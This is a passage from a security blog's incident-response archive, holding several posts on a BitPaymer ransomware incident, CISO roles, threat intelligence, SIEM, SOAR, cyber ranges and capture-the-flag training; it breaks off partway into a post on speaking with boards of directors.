Category Archives: Incident Response (IR)

Attackers Compromise Admin Account to Infect Manufacturing Company With BitPaymer Ransomware

Threat actors compromised an account with administrator privileges to infect a manufacturing company with BitPaymer ransomware.

A Trend Micro investigation found that digital attackers sent some commands via PsExec — a command-line tool for executing processes on remote computers — to copy and execute a variant of BitPaymer between 9:40 p.m. and 11:03 p.m. on Feb. 18, 2019. Only accounts with administrator privileges can run commands via PsExec. Acknowledging this fact, researchers reasoned that the manufacturing company suffered a security breach prior to the ransomware’s execution.

Between Jan. 29 and Feb. 18, Trend Micro helped detect several instances in which threat actors attempted to infect machines with an Empire PowerShell backdoor. These attack attempts occurred remotely and filelessly, though Trend Micro did detect binaries associated with Dridex, a banking Trojan that ESET linked to BitPaymer’s creators last year.

Not a New BitPaymer Variant

Ransom.Win32.BITPAYMER.TGACAJ, the BitPaymer variant involved in this attack, was unique in that it used the victim organization’s name in its ransom note and as an extension name for encrypted files. But it’s not the first time that security researchers have observed such behavior of the ransomware. Back in November 2018, a malware researcher revealed on Twitter how they had spotted a similar version of the threat targeting several companies.

This attack also comes at a time of sustained activity for BitPaymer. For instance, the ransomware infected several hospitals belonging to NHS Lanarkshire back in August 2017, as reported by Bleeping Computer. About a year later, officials from the Alaskan borough Matanuska-Susitna revealed in a statement how a variant of the crypto-malware had infected the town government’s networks.

How to Defend Against a Ransomware Infection

Security professionals can help defend against ransomware by using an endpoint detection and response (EDR) tool to monitor IT devices for suspicious activity. Teams should also use a patch management tool to keep their software up to date, thereby preventing attacks from using known vulnerabilities to infect their workstations with ransomware.

Furthermore, organizations should create or update their incident response plan and keep this framework effective by testing it consistently and making it inclusive of stakeholders.

The post Attackers Compromise Admin Account to Infect Manufacturing Company With BitPaymer Ransomware appeared first on Security Intelligence.

In Such Transformative Times, the CISO Is Key to Delivering Digital Trust

For organizations today, staying competitive means undergoing rapid digital transformation, yet few appear to have a solid approach for handling the security and privacy implications of such a change. However, ensuring organizations adapt while also retaining a high level of digital trust is exactly where the chief information security officer (CISO) can help. CISOs are adept at reviewing the security of digital crown jewels — sensitive, business-critical data — aligning security to business goals, and ensuring that disruptive technologies such as artificial intelligence (AI), internet of things (IoT) devices and augmented reality are adopted with adequate security and privacy controls.

Conveniently, there are resources to guide CISOs on how to engage on these issues. One such resource is PwC’s “Digital Trust Insights” report, which replaces their long-running Global State of Information Security Survey (GSISS) series with a broader view of cyber risks awaiting the cognitive enterprise. The report — which is based on a survey of 3,000 executives and only about a dozen pages — provides advice for CISOs, boards and business executives to rally around key issues of digital trust as they work to build a reasonably secure digital world.

Get Security Involved Early On

It will come as no surprise to anyone in cybersecurity that the best way to avoid costly and awkward security fixes — or worse, an embarrassing and damaging breach — is to bring in the security function early on in a project. The stakes are even higher for digital transformation projects. While 91 percent of companies executing transformations bring in security and privacy as stakeholders, only 53 percent are proactively managing security and privacy risks “fully from the start.” This varies somewhat by sector, and as expected, the financial services sector is in the lead with 66 percent engaging security and privacy from the start, followed by the healthcare sector (65 percent). The consumer markets sector comes in last, at 49 percent.

Bringing in stakeholders from cybersecurity and privacy from the very beginning of transformation initiatives is key. As the report noted, “Most respondents say emerging technologies are critical for business, but fewer are very confident they have sufficient ‘digital trust’ controls in place.” This is reflected in the survey results with 4 out of 5 organizations reporting that the IoT is critical to at least some parts of their business, yet only 39 percent are “very comfortable” with the digital trust controls deploying alongside their IoT adoption.

Early involvement of the security function will also improve alignment of security efforts with the business, a concern that was raised in the report as few organizations regularly assess that their security controls, frameworks and strategies are still appropriate in light of the digitization of the enterprise and the changing privacy landscape.

Review Security Talent and Workforce Awareness

In most organizations, the security function is already stretched thin and thus not in a position to handle the many new challenges posed by an organization undergoing rapid digital transformation. When the CISO is spending most of his or her time fighting fires or pleading for budget and support, there is little time left to review high-level security strategy, ensure appropriate privacy controls around sensitive data, and adequately communicate enterprisewide security issues to top leadership and the board. Another concern is the low number of organizations that report having a security awareness program (34 percent), and even fewer require training on privacy policies and practices (31 percent).

The way forward is to perform a workforce gap assessment specifically for the cybersecurity and privacy functions, and to commit to filling key roles in security and privacy with the required level of talent. In addition, organizations should review and update — or implement if absent — policies about their IT assets and sensitive data. Security awareness campaigns should be conducted regularly, but avoid the one-size-fits-all web-based approach. Instead, look for or create engaging security awareness materials and evaluate the effectiveness of each campaign. As attackers are continuously refining their tactics, so should you with your security awareness activities.

Improve Communications and Engagement With the Board

As years go by, we get further validation that an increasing number of CISOs are providing the board with updates about cyber risks. Findings from the PwC report echo this progression, with 80 percent of organizations stating their board was provided a risk management strategy. However, only 27 percent of organizations report being “very comfortable” that the board is getting adequate metrics on cyber risk management. Instead, a greater number, 29 percent, report being “uncomfortable” with the adequacy of information reported.

Changing the nature of the engagement between the CISO and the C-suite will take time. But the change needs to get under way, starting with communicating how threats, regulations and third-party risks impact the organization’s cyber risks. CISOs should focus on producing metrics that track the risks to business objectives and how security activities are having a measurable impact to bring those risks down to an acceptable level. Greater emphasis should be placed on the nature and quality of interactions between the CISO and the decision-makers rather than having the CISO deliver a quarterly five-minute broadcast about the organization’s security posture.

Instead, CISOs should spend a little more time learning about their audience, what drives each line of business and their particular concerns, provide materials to prime questions ahead of time, and actively invest in their relationship with the rest of the C-suite and business directors.

Test Cyber Resilience and Improve Strategies

While awareness, engagement and being there from the start are important, the only way to know for sure that the organization is prepared to deal with a data disruption or full-blown cyberattack is to put its cyber defenses to the test. Testing the cyber resilience of the organization can take many forms, depending on the level of the staff or the executives involved. The PwC report found that fewer than half of mid-to-large organizations are “very comfortable” that they have adequately tested their cyber resilience.

Once again, the CISO can and should play a key role on this issue, but doesn’t have to start from an empty slate. Several key organizations have produced reports on cyber resilience, some written specifically for the C-suite and the board, while others were written with chief information officers (CIOs) and CISOs specifically in mind.

Among the many resilience reports available are those from IBM Security and Ponemon Institute, the World Economic Forum (WEF) and the U.S. Department of Homeland Security (DHS). The latter defines resilience in cyberspace as the “ability to adapt to changing conditions and prepare for, withstand, and rapidly recover from disruption.” Organizations should evaluate their ability to adapt to changing conditions and threats, including adapting organizational strategies; prepare for (including anticipating and planning ahead of disruptions); withstand (an area that should be tested more regularly than during the yearly pen test); and recover from an adverse event.

The CISO Is Key to Successful Digital Transformation

“Companies that show the connected world how to lead in safety, security, reliability, privacy, and data ethics will be the titans of tomorrow.” — PwC “Digital Trust Insights” report

Becoming a cognitive enterprise will require major changes, changes that can shake the foundation of trust in the organization’s customers and partners. Organizations will need to balance digital innovation with cyber resilience by ensuring early engagement of the security function in major projects and seeking whole-enterprise visibility and awareness of digital risks. The CISO is key to the organization maintaining a high level of digital trust in such transformative times.

The post In Such Transformative Times, the CISO Is Key to Delivering Digital Trust appeared first on Security Intelligence.

Level Up Security Operations With Threat Intelligence Cheat Codes

Few fields have experienced growth over the last two decades like cybersecurity and video gaming. Through the years, both industries have seen the rise and fall of incumbent players and the near-constant shift in consumer preferences. While learning how to embrace their own platform shifts, both fields have had to fundamentally reinvent themselves to adapt and survive.

Arcade-Style Silos Make Way for Plug-and-Play Solutions

For many people, their first memorable experience with video games was at an arcade. Arcade operators made heavy one-off investments for each new game that came out. For example, “Mortal Kombat 2” and its sequels did not build onto or integrate with the existing “Mortal Kombat” games. In many ways, this issue has also plagued cybersecurity, with the average organization deploying 80-plus point products from over 40 vendors.

The advent of the console flipped the gaming industry on its head. Rather than having to buy a new machine for each game, there was a single interface that ran multiple games — classic examples of which include the Super Nintendo Entertainment System (SNES) — where additional functionality was just a cartridge away. Rather than shelling out for singular monolithic solutions, consumers preferred modular platforms that enabled them to add additional games in a snap.

The consumer shift toward unified platforms is true today in security as chief information security officers (CISOs) look more for integrated solutions with the ability to add new features as their organization matures. But even as silos are broken down and security data becomes more unified, how can organizations derive actionable insights from the data to understand their adversary, reduce their investigation time and increase visibility into their environment?

What’s Video Game Design Got to Do With Threat Intelligence?

Threat intelligence is the connecting of specific threat identifiers across many cybersecurity tools and infusing the information into proactive investigation, incident response and remediation workflows. When designing a threat intelligence strategy that allows analysts to detect threats at a rapid pace and developing security operations center (SOC) leadership to make informed decisions, it’s important to consider your organization’s unique needs based on factors such as industry, geography and the nature of your most critical assets.

Similarly, depending on the type of game and its objectives, video game designers choose to focus on varying aspects when developing a game, but three are always constant:

1. The Characters and Players

The good-versus-evil dichotomy is often invoked when talking video game character development; it’s also reflected in the constant game of cat-and-mouse between organizations and threat actors. Whether it’s Mario versus Bowser or analyst versus cyber adversary, it is important to understand the motivation behind attackers to better anticipate their next steps.

Whether that’s kidnapping the princess or exfiltrating sensitive information, security leaders can make informed risk management, organizational and staffing decisions by understanding how the enemy operates. By knowing, for example, that a specific threat actor is targeting their industry, analysts can quickly identify whether they are at risk of an exploit or take proactive steps to patch and protect potentially affected systems.

To invoke Sun Tzu, knowing your enemy is knowing yourself, so having a complete view of which attackers are targeting industry peers or geographic neighbors can give you a window into the mindset of the adversary and help your organization prepare stronger defenses by understanding the vulnerabilities before they become an attack.

2. Narrative and Gameplay

One element that separates some of the best games from the rest is a strong narrative element within a collaborative, multiplayer world. Designers carefully curate decision points for the user, having them make choices that potentially alter how the game unfolds. Threat intelligence guides users in their decision-making process to help inform all levels of the SOC. Tactical threat intelligence can be integrated into the workflow to help reduce false positives, enabling the frontline analyst to quickly decide what is real and what is noise. And for tier-two and -three analysts, who proactively hunt threats and facilitate incident response, having information on the a particular actor’s tactics, techniques and procedures (TTPs) can help them better make day-to-day decisions on task prioritization, threat mitigation and resource allocation.

As the trend has been in recent years, single player modes are being phased out in favor of multiplayer online games. In these games, there is a strong need for communication and collaboration, since most are team-based and the success of the individual depends on the success of the team. Even though analysts may sometimes feel that they’re fighting the battle alone, cybersecurity is a team sport. Threat intelligence is collaborative by nature, with many feeds being driven by a combination of individuals sharing information for others in their industry and validated information from threat researchers.

Threat intelligence can be the unifier for members of the security operations center to collaborate when dealing with investigations and incident response. When teams have identified a validated threat and need to investigate or initiate a response workflow, threat intelligence solutions can integrate with incident response and case management tools to enrich playbooks with specific information about the threat. When it’s all hands on deck, teams can quickly collaborate and add additional indicators as they build the investigation and search threat intelligence for more relevant information.

3. Repeat Playability

The best games are not only fun to play once, but over and over again for years — what gamers refer to as repeat playability. Organizations typically deploy multiple threat intelligence feeds of varying quality for broad and overlapping coverage. While having more data at your teams’ fingertips is generally a good thing, increased visibility often comes at a cost. Gone are the days where security teams could get by with multiple static dumps of comma-separated values (CSVs) with indicators of compromise (IoCs). Even with four threat intelligence sources that provide 300 indicators a day, teams are receiving almost 500,000 indicators a year.

Analysts are overwhelmed, spending hours sifting through data searching for a what feels like a needle in a needle stack to find bits of actionable information. The repetitive nature and sheer volume of their workload, coupled with the cybersecurity skills gap, often leads to analyst burnout. When potential threats are automatically prioritized based on severity, it reduces investigation time and allows analysts to focus on only the most critical threats to their organization.

Up, Up, Down, Down, Left, Right, Left, Right

With actionable and relevant threat intelligence, security teams have the ability to see the previously unseen and significantly accelerate the way they work. Just like the Konami Code did for “Contra,” threat intelligence can provide organizations with security operations cheat codes to gain the competitive advantage they need to combat cybercriminals.

Register for the May 2 webinar to learn how to unlock threat intelligence easter eggs

The post Level Up Security Operations With Threat Intelligence Cheat Codes appeared first on Security Intelligence.

What Is the Role of SIEM in the Fusion Center Era?

Despite what you may have heard, security information and event management (SIEM) is not dead. Rather, it’s become an integral part of the latest advancement in security operations: the fusion center.

We are seeing a paradigm shift in the space, and SIEM is no longer enough on its own to conduct the level of protective monitoring organizations need to stay abreast of rapidly evolving threats. Instead, companies are looking to more comprehensive solutions that, when integrated with state-of-the-art SIEM tools, can help organizations go beyond simply detecting and reporting security incidents.

Why SIEM Only Addresses Part of the Problem

Protective monitoring is a maturing discipline within the cybersecurity portfolio. I still remember the early days when it involved little more than storing logs, usually for years. If you were lucky, you had some analytics tools to help you stitch together what went wrong, but only after the event had already occurred. Granted, this was a useful exercise to close awareness gaps and learn lessons, but it wasn’t really monitoring — and I’m not sure who ever took the time to sift through all that data.

So the security community endeavored to come up with a way to stop the horse from bolting in the first place, and SIEM was born. Along with the security operations center (SOC), this solution enabled organizations to monitor what was going on across their systems in real or near real time. As SIEM has evolved, we have developed the ability to correlate different logs, look at network flows, consider user access patterns and use powerful artificial intelligence (AI) to spot anomalies, the needles in all those haystacks of data.

However, standing up your own SOC is an expensive undertaking. That’s why, along with the technology itself, we have also developed new consumption models — in-house, outsourced, shared and cloud-based platforms — that are all aimed at reducing the costs of trying to spot what is happening on your infrastructure.

There are two problems with the current SIEM paradigm, however. First, it can take months to set up a SIEM solution properly, and it requires constant tuning to reduce false positives and allow your SOC team to adjust to changing business patterns. Second, too many SOC delivery models involve little more than spotting a problem and then simply telling someone about it. Of course you would want someone to wake you up and alert you at 4 a.m. if you’re under attack, but it doesn’t solve the underlying problem. How can organizations update the way they use SIEM and security analytics tools to match the speed and complexity of today’s threat landscape?

Introducing the SOC’s Big Brother: The Fusion Center

If we look at the five functions of the National Institute of Standards and Technology (NIST) Cybersecurity Framework — Identify, Protect, Detect, Respond and Recover — so far, we are only covering the detection part of the equation. To fill in the gaps, we’re now witnessing the emergence of the SOC’s big brother: the fusion center. The fusion center’s job is to cover the entire spectrum of the NIST model.

What makes the fusion center different? Whereas a SOC only pulls in data from your infrastructure and then stops at an analyst, the fusion center uses a wider set of data sources, collects data from both inside and outside your organization, correlates and enriches that data (often using advanced AI and machine learning to draw conclusions), and pushes this enriched information out to the relevant parts of your organization to respond and recover.

There are multiple advantages to the fusion center approach. Due to advanced automation and the use of machine learning, between 30 and 70 percent of level 1 analyst tasks can be automated, which helps improve response times, reduce the number of analysts needed and free up your security teams to focus on more important tasks.

Another advantage is that, due to the multiple sources of information being ingested by the system (including from native cloud monitoring tools), you can conduct more thorough and in-depth analyses of what is happening on your infrastructure and cloud systems, draw better conclusions and identify wider implications from initially simple-looking issues.

Finally, you can mount a more consistent and thorough response by using integrated runbooks and regularly drilling incident response plans. You can also implement systems that automatically notify relevant parties of key developments and collect and analyze threat data in a single portal. This results in faster containment and eradication with a complete record of what has occurred so you can review lessons learned and continuously improve your processes.

So is SIEM dead? Not remotely — but it’s no longer the only tool in your arsenal, either. With fusion center capabilities, you can harness the power of AI and machine learning to deliver better protection and speed up recovery times.

The post What Is the Role of SIEM in the Fusion Center Era? appeared first on Security Intelligence.

Cyber Resilience Study: Incident Response Plans and Security Automation Set High Performers Apart

Today, the Ponemon Institute released its fourth annual “The Cyber Resilient Organization” report. This global study was the first of its kind back in 2015 and has been proudly sponsored by IBM Security since the beginning.

Over time, the importance of cyber resilience within the organization has grown significantly. Security leaders are striving to benchmark the organization’s preparedness and level of security, and measuring cyber resilience is a good reflection of their ability to withstand cyberattacks.

This year’s study queried 3,655 IT and security professionals and covered 11 different global markets: the U.S., Canada, India, Germany, Japan, Brazil, the U.K., France, Australia, the Middle East and Southeast Asia.

Benchmarking Cyber Resilience to Identify Best Practices

When we look back on last year’s study, the biggest barrier to cyber resilience was a lack of investment in important tools, such as artificial intelligence (AI) and machine learning. We saw a significant change here with 23 percent of respondents now using security automation, which includes both AI and machine learning, extensively.

As part of this research, we created a benchmark for measuring cyber resilience by isolating the most cyber resilient organizations and uncovering their approaches and habits; we refer to these organizations as high performers. In this year’s study, 960 respondents — 26 percent of the total sample — identified as high performers. Let’s look at some of the key things these organizations are doing differently to achieve this enhanced level of cyber resilience.

First, high performers have response plans. Fifty-five percent of high-performing organizations have a cybersecurity incident response plan (CSIRP) deployed across the organization, as opposed to only 23 percent of the rest of the pool. Meanwhile, 77 percent of businesses do not have a consistently deployed plan. While this figure hasn’t changed significantly in the four years since we started this research, there is a surprisingly large number of organizations that lack this fundamental building block to achieving cyber resilience.

This year, for the first time, we followed up with these respondents to understand what obstacles they faced. Some said they lacked the necessary staffing or strong leadership required to drive this process, while others pointed to difficulties with organizational structure that didn’t support a centralized approach.

It is no surprise, then, that nearly half (46 percent) of respondents said their organization has yet to reach full General Data Protection Regulation (GDPR) compliance nearly a year after the data privacy regulation took effect in May 2018. In future research, we plan to explore the reasons why companies lack a consistent incident response plan.

What Sets High-Performing Organizations Apart?

It’s clear that being a high performer has a positive impact on an organization’s security posture. High performers suffer fewer data breaches (41 percent versus 55 percent) and less disruption caused by cyberattacks. When we look further at the characteristics of high-performing organizations, it comes down to a blend of people, processes and technology.

In terms of people, the skills gap remains a critical barrier for most organizations, with respondents highlighting headcount gaps and the difficulty in hiring and retaining skilled staff as key hurdles. High-performing organizations are better able to address this and, more importantly, have leadership that values these skills and the importance of cyber resilience.

When it comes to processes, more than 55 percent of high-performing organizations have a consistently applied CSIRP, and they are more likely to participate in threat intelligence and data breach sharing partnerships (69 percent versus the average of 56 percent).

Finally, high performers identified IT complexity as a challenge. As a result, these organizations are more likely to have less security solutions deployed (39 versus 45) and to believe they have the right technology footprint to achieve cyber resilience.

Reduce the Cost of a Data Breach With Security Automation

There is a clear need for organizations to establish a strategy to address these challenges and think about how they handle security incidents in the context of the GDPR and other regulations.

The volume and severity of cyberattacks continue to rise, but research has shown that technology adoption around security automation can save organizations up to $1.55 million on the total cost of a data breach, whereas organizations that do not leverage security automation end up realizing a much higher total cost of a data breach.

Register for the Live Webinar on April 30 at 12 p.m. ET to learn more

The post Cyber Resilience Study: Incident Response Plans and Security Automation Set High Performers Apart appeared first on Security Intelligence.

SOAR: The Second Arm of Security Operations

While security information and event management (SIEM) is rightly considered an indispensable tool for detecting and managing threats, it can only do so much good if you’re just detecting threats to respond to them. Of course, successful threat management demands rapid incident response, and security operations teams tend to overemphasize detection as a result.

How can organizations both empower their responders to remediate threats quickly and strengthen their security posture to prevent data breaches in the first place? The answer is security orchestration, automation and response (SOAR).

SOAR Solutions Add Context to SIEM Data

SIEM solutions are now deployed in virtually every large enterprise, and for very good reason. In the U.K., in fact, the RM3808 regulation precludes any organization from bidding for public sector network services work unless it has a SIEM solution in place. This makes sense: Companies should be monitoring their events and data flows if they expect to detect threats to their information or that of their customers.

SOAR tooling enables security operations teams to automate the tedious and repetitive elements of their workflow that don’t require human oversight and instead focus on more mentally challenging tasks that call for discernment and judgment. The best SOAR solutions enrich and contextualize threats to help analysts quickly triage cases according to the severity of the risk, sensitivity and/or criticality of the business functions under threat.

Many of the remedial tasks that fall under the analyst’s supervision, such as isolating endpoints, can be orchestrated with a SOAR platform via application programming interfaces (APIs). Faster remediation leads to earlier resolution of incidents in the attack chain, which greatly reduces the risk of a data breach.

A Force Multiplier for Understaffed Security Operations Teams

Even if you had an unlimited security budget at your disposal, you would still struggle to hire the caliber and quantity of talent you need to stay on top of the constant barrage of threats to your organization. According to Cybersecurity Ventures, the cyber skills shortfall is expected to hit 3.5 million unfilled positions by 2021. This is one of the reasons why white hats are lagging behind the increasingly sophisticated threat landscape in the cyber arms race.

SOAR solutions can help organizations address the talent gap by lightening analysts’ manual workload and sharpening their ability to prioritize the most pressing threats and remediate them quickly.

Enrichment and Contextualization: Where SIEM Ends and SOAR Begins

There is a degree of overlap in how vendors describe the enrichment and contextualization functionalities of their SIEM and SOAR solutions. It’s common for both products to claim that they enrich, contextualize and help triage threats. But where does SIEM end and SOAR begin?

SIEM is all about detection. The amount of automation and orchestration required for swift incident response cannot be carried out at the detection layer. If a SIEM tool processes between 10,000 and 500,000 events per second — as it does in most cases — the computing resources required are simply not available to enrich this volume of data. So why can’t the enrichment take place once the SIEM tool has generated an offense or incident?

For the average enterprise, only about 80 percent or less of incidents originate from SIEM. It’s important to channel incidents generated by data loss prevention (DLP) tools, managed service alerts, phishing and investigations into one place so your security operations center (SOC) analysts or computer security incident response team (CSIRT) can contextualize and act upon them. SIEM tools are not optimized to support this alongside the mammoth task of analyzing enormous reams of events and data flows according to predefined correlations and indicators of compromise (IoCs). Endpoint detection and response (EDR) and threat intelligence platforms are not integrated, thus the SIEM only assists with part of the investigation process.

Lastly, case management is arguably the most crucial feature set within incident response. Cybersecurity playbooks have become enormously complex, and the level of effort and cost needed to build them into the detection layer is often prohibitive.

Why Detection Alone Is Not Enough

It goes without saying that well-calibrated detection tools give the incident response function the data it needs to remediate threats. But having well-defined incident response plans can also help sharpen and refine the rules and use cases you use to calibrate your SIEM solution. The benefits are bidirectional: What correlations and indicators are you looking for? Why are you looking for them? Once you find them, what is the incident response plan?

One of our clients recently enacted a protocol whereby detection use cases are only written if they have an associated incident response plan. If you want to write SIEM rules for the sole purpose of visibility and metrics, that’s all well and good. However, being deliberate and honest about this will keep your operations more streamlined.

If your function is willing to spend thousands or even millions on SIEM solutions but not prepared to deal efficiently with the alerts being outputted, what is the value of that investment? Why wait until your SIEM tool is churning out alerts before realizing that your team is overwhelmed?

Clients of ours that have run parallel SIEM/SOAR proofs of concept (POCs) have saved significant amounts of time and effort compared to those that have undergone an arduous SIEM POC only to have to follow up with another SOAR POC. In one case, a client even decided to switch off its SIEM solution until it had implemented a SOAR tool to help it deal with the torrent of alerts. Given that SIEM and SOAR are two sides of the coin that comprises security operations, why serve these POCs consecutively when they can be executed concurrently?

The post SOAR: The Second Arm of Security Operations appeared first on Security Intelligence.

Why Cyber Range Training Should Be Top of Mind for Your Security Teams

With breaches making headlines every other week, security teams hardly ever have enough time to ramp up and test their defense strategy before a new and more sophisticated attack surfaces. When reputation, revenue and customer trust is at stake, it’s critical for organizations to detect, respond and manage security incidents effectively. But how can organizations prepare?

Although there is no “magic answer,” incident preparation is key, and testing your incident response (IR) plan can be the difference between success and failure if, or when, a breach occurs. In fact, “The Forrester Wave: Cybersecurity Incident Response Services, Q1 2019,” released earlier this month, mentioned that vendors that provide cyber range services “position themselves to successfully deliver strong incident preparation and breach response to their customers.”

The Value of Cyber Range Training

When I joined IBM Security nearly three years ago to build out the X-Force Incident Response and Intelligence Services (IRIS) team, one of my primary goals was to guide the team to focus on core solutions that deliver value to the enterprise. However, I realized that even though our team focused on embedding threat intelligence into our IR engagements and specialized in comprehensive post-breach remediation, we needed to do more.

We needed to offer the next generation of IR preparation and give our clients access to cyber ranges, where they could practice defending against simulated threats in immersive, real-world training scenarios. We wanted to mature the experience for our clients from PowerPoint-driven tabletop discussions to real-world simulated attacks that test multiple dimensions and stakeholders within environments.

We believed these types of simulations more accurately reflected what responding to a breach was actually like — the feeling of being under pressure 24 hours a day during the event, and the pressure to analyze data quickly, provide status updates, speak with the press, work with internal and external legal counsel, and communicate to clients. We believed that if we could create an environment like this and enable our clients to train in it, each one would leave better prepared than they came in.

Let’s dive deeper into a few key reasons why security teams should consider testing their current response capabilities within a scenario-driven, simulated cyber range.

1. Practice Makes Perfect

Cyberattacks change quickly, so training must test your organization’s ability to adapt its actions and be responsive enough to keep up with new attack methodologies. Cyber ranges enable security teams to practice identifying and responding to threats in a real-world environment using a variety of technologies and runbooks. When security teams actively train in environments that effectively simulate a real-world breach, they are more likely to retain the information learned and respond more quickly when an actual breach occurs.

2. Gain Hands-On Experience

Cyber ranges offer an environment for teams to train collectively, improve their cyberdefense skills and gain critical insight into a variety of stakeholder actions within the organization. This tends to improve communication and teamwork across the enterprise because it gives teams a better understanding of what other departments are responsible for. This is critical to building a successful IR team, and it’s difficult to obtain that experience through conventional training simulations.

3. Advance Organizational Security

Training in an authentic but controlled environment can help security teams deal with crisis situations in a rapid manner. Simply put, the more security-savvy your teams are, the better prepared they will be to implement and execute the most efficient security strategy for today and tomorrow.

Fortifying a Defense Starts With People

Organizations are relying more and more on people as their first line of defense. Although the maturity of effective security technology is growing, it’s still important for cybersecurity teams to train their response in realistic and immersive environments. Cyberthreats won’t stop, so your security teams shouldn’t either. By leveraging cyber range training and bolstering your incident response strategy, your organization can evolve its approach and proactively defend against rapidly evolving threats.

The post Why Cyber Range Training Should Be Top of Mind for Your Security Teams appeared first on Security Intelligence.

Capture the Flag Competitions Can Help Close the Security Skills Gap

I first learned about gamification in college when I attended a talk about internship opportunities at IBM. Jason Flood and William Bailey, members of the security teams at IBM Collaboration Solutions (ICS) and Industry Solutions, made a great impression on me when they spoke about capture the flag (CTF) events they were building for students and the IT industry.

What really piqued my interest was how gamification and capture the flag events could teach people about security in a learning environment without a lot of pressure. I was what you would describe as a new collar candidate. I hadn’t gone straight into college after my primary education, instead going into the workforce as a laborer and truck driver. But I decided to go back to school to retrain and rewire my brain for new skills in the IT world.

I’ve always had an affinity for electrical things and learning how they worked. I was grounded once as a kid for taking apart the clothes iron and reassembling it in a nonconventional way. IT seemed to be the next logical progression in my career, where I could break stuff intentionally. After an internship at IBM, I was luckily accepted into the ethical hacking team in the Dublin, Ireland lab at the ripe old age of 33. The ethical hacking team at that time was very involved in providing cybersecurity education and CTF frameworks for universities and conferences throughout the U.K. and Ireland. Some members of that team have gone on to join IBM X-Force Red. It was during this time that I really caught the gamification bug.

Gamification and Capture the Flag: What Are They?

Most people interact with some form of gamification in their daily lives. What is it? Gamification — the application of game-design elements and game principles in nongame contexts — taps into that natural human need to play, improve and maybe win sometimes. For example, we use gamification when we collect coupons at the store, participate in loyalty programs and use fitness apps. Gamification is also used in the education system — think student rankings based on GPA, dean’s lists, honor rolls, scholarships, etc.

A capture the flag exercise is a gamified set of challenges designed to teach cybersecurity skills in a variety of categories. CTF events generally have a mixture of professionals and students participating. The types of CTF are Jeopardy-style, attack-defense and mixed.

Jeopardy-Style CTF

In a Jeopardy-style CTF, participants take on challenges in a range of categories, including application security, forensics, reverse engineering, cryptography and more. Teams discover “flags” and submit them for points. Challenges get progressively harder and teams earn more points based on the level of difficulty.

Attack-Defense CTF

In an attack-defense CTF, competitors attempt to compromise systems and services with known vulnerabilities. Once a team has compromised a system, it must then defend that system against opposing teams. Participants perform the actions of a red team (attackers) and switch to the blue team (defenders) seamlessly. This game can be continuous and run for many days.

A mixed CTF is a combination of both Jeopardy and attack-defense.

Many of the challenges in CTFs are built around the OWASP Top 10 Application Security Risks or the SANS Top 25 Most Dangerous Software Errors, which give participants a feel for real-world vulnerabilities that many industries have to contend with.

How CTF Events Can Help Recruit and Train Cybersecurity Experts

The value of CTFs in terms of cybersecurity awareness, training and education is evidenced by the number of CTF events out in the wild today and the caliber of participants. CTFs are valuable for sharpening the skills of technical operators. Just like athletes who constantly train to stay in top shape, cybersecurity experts need to keep on top of their game.

From attending and building CTFs myself, I have seen how they can be used to train new hires and employees and as a tool for recruitment. Given the impending global cybersecurity skills gap that’s expected to reach approximately 3.5 million unfilled jobs by 2021 and attacks rising year after year, as a community we need to engage people sooner in the career pipeline. This is why the new collar approach — considering job candidates who lack a college degree or cybersecurity background — is so vital.

I’ve also seen how CTFs can provide an opportunity for a company to interview large numbers of people in a safe and controlled environment. I’ve observed recruiters from many companies walk the CTF floor asking people questions during an event. The benefit for recruiters is that they can witness participants showcasing their technical, social and teamwork skills in person. Recruits can discuss vulnerabilities and demonstrate how they compromised systems, how the team broke down tasks and how they solved them.

The environment of a CTF is relaxed and fun, which enables people to show their social side. This environment removes the pressure of an interview, where you’re sitting in a chair in a small room, slumping awkwardly in an ill-fitting suit and hoping you don’t answer any of the questions wrong. The CTF is the place where you can make mistakes, hone your skills and become a better professional.

Engaging and Training the Next Wave of Cyber Professionals

I am lucky enough to have been part of many CTF events over the years, and I’ve seen the concept evolve into an amazing platform for engaging employees, raising awareness and training the future cyber workforce. I am also lucky to be part of IBM’s world-class X-Force Command special forces team as a gamification engineer.

IBM Security is at the forefront in the gamification space, as is evident from the unique facilities we have in the X-Force Command Cyber Range in Cambridge, Massachusetts and the X-Force Command Cyber Tactical Operations Center (C-TOC), a security operations center (SOC) and cyber range aboard an 18-wheeler tractor trailer, now touring Europe.

Our gamified breach simulations immerse participants in a scenario that brings them as close to the endgame as possible. In this high-pressure scenario, clients can test their processes, identify gaps in their security plan and train the muscle memory that is required for when worst happens.

My small part in this well-oiled machine is to provide the technical aspects of the cyber range offerings, building out attack scenarios in the attack-defense challenge we call Cyber Wargame. I also work on developing CTF events within IBM’s own CTF framework, doing my part to help engage and train the next wave of cyber professionals here at IBM.

It’s exciting to do this work for IBM, but I also enjoy taking my experience creating CTFs outside of my job. Last month, I was honored to have the opportunity, along with the Irish branch of the nonprofit security organization Honeynet Project, to support the inaugural cybersecurity competition at the Ireland Skills Live event. WorldSkills competitions have been running since 1950, but this was the first event in Ireland, with teams from universities across the country competing for a chance to represent the nation at a future event in a global WorldSkills competition.

The upcoming graduates’ passion for cybersecurity and vast array of knowledge was clear. Participants told me they had played in many CTFs and that they feel it gives them a better chance at employment. The interest from spectators was very high too, which was one of my main goals for this event. I really wanted to raise awareness among the public and remove some of the mystique around cybersecurity, while correcting the Hollywood notion some people have of cybersecurity.

The event was a success from a recruitment perspective, with many colleges and schools requesting an on-site event for their students. Parents and their kids asked for resources and locations where they could get more information and participate.

The security community offers many opportunities for information sharing, learning and networking, and none more so than a CTF event. Events like this can only help in tackling the cybersecurity skills gap going forward.

Discover How IBM X-Force Command Helps Teams Prepare for a Breach

The post Capture the Flag Competitions Can Help Close the Security Skills Gap appeared first on Security Intelligence.

The Language of Business: Where the Board of Directors and Security Leaders Can Meet

A few years back, a business association asked me to deliver a cybersecurity presentation. I knew some in attendance would report back to their respective board of directors, and I expected it to be a challenging session because cybersecurity knowledge and literacy would be all over the map.

It’s a situation I’ve encountered regularly. I remember in one session with about 40 people, I asked what they thought “cybersecurity” meant. Somehow, I think I got 45 different answers. Even within an organization’s board of directors, people who absolutely need to be part of the cybersecurity conversation today, you’d likely get the same variance in responses.

But I welcomed the session because it gave me an opportunity to pilot a new presentation tactic. The presentation focused more on business in general and business development as opposed to cybersecurity, and the presentation style was so outside-the-box, I was actually nervous.

To Engage the Board, Talk Business, Not Cybersecurity

Going in, I knew some of the attendees expected to hear some cybersecurity techno-babble. I did none of that. Instead, I used the simplest possible language and cartoons to disarm these senior leaders for one reason: I wanted them to feel comfortable and able to talk freely about that bogeyman topic, cybersecurity.

